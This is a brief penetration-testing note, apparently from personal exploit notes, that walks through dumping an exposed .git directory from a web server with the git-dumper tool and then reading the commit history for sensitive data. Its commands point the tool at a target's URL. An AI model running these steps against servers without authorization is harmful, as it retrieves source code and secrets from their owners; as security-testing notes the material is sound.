Dumping Git from URL

Dump Git Repository from Website - Exploit Notesexploit-notes.hdks.org

I will be dumping the data of .git from web server.

For this I will be using Git-Dumper Tool.

Dumping .git from URL

Step 1: Make a Virtual environment first.

virtualenv temp_env
source temp_env/bin/activate

Step 2: Install the Git-Dumper tool

pip install git-dumper

Step 3: Run the command:

# git-dumper [options] URL DIR
# Example:
git-dumper http://$ip/.git/ website

Step 4: Verifying

# Verify if .git is fetched or not.
cd website
ls -la

Step 5: Run any git command

git status 
git log
git show <SHA>

A list of commands can be found in the "Git Command Utility" section.

To find important data. Read mentioned the comment in the git log.
